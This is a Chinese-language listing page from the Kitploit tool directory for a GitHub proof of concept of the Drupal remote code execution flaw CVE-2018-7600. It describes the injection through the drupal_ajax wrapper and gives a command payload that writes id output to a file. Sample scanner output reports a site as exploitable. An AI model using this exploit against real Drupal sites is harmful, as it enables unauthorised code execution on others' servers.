Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2018-7600 — Drupal CVE-2018-7600 / SA-CORE-2018-002 的概念验证 | Kitploit
工具/GitHubGitHub/thehappydinoa/cve-2018-7600
漏洞分析漏洞利用Web应用程序漏洞利用学习与教育Payload 开发Archived
GitHubthehappydinoa/cve-2018-7600

CVE-2018-7600

Drupal CVE-2018-7600 / SA-CORE-2018-002 的概念验证

查看仓库
713年前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2018-7600 / SA-CORE-2018-002 的概念验证 codebeat badge

在 Drupal 7.58 之前版本、8.x 版本 8.3.9 之前、8.4.x 版本 8.4.6 之前以及 8.5.x 版本 8.5.1 之前,远程攻击者可以通过影响多个子系统(使用默认或常用模块配置)的问题执行任意代码。

工作原理

  1. 向 drupal_ajax 封装发送数据包以注册用户。允许用户使用 exec 标记并运行 bash。此 PoC 将用户名和 ID 发送至 abcde.txt。

    root@kitploit:~
    echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee abcde.txt
    
  2. 检查 http*://example.com/abcde.txt

    root@kitploit:~
    [!] PROVIDED ONLY FOR EDUCATIONAL OR INFORMATION PURPOSES.
    [?] Enter file name (example: /root/file/hosts.txt): hosts.txt
    [+] https://example.com/ Possibly exploitable
    [~] Checking... https://example.com/abcde.text
    [+] https://example.com/ Exploitable
    [+] UID: 33 Name: www-data
    [+] Deleting... https://example.com/abcde.text
    

Payloads

%s = 文件名

用户 ID、PID 和组 Payload

root@kitploit:~
echo Name: $(id -un) UID: $(id -u) Groups: $(id -Gn) | tee %s

致谢

  • 感谢 Vitalii Rudnykh

仅供教育或信息目的提供。

下载工具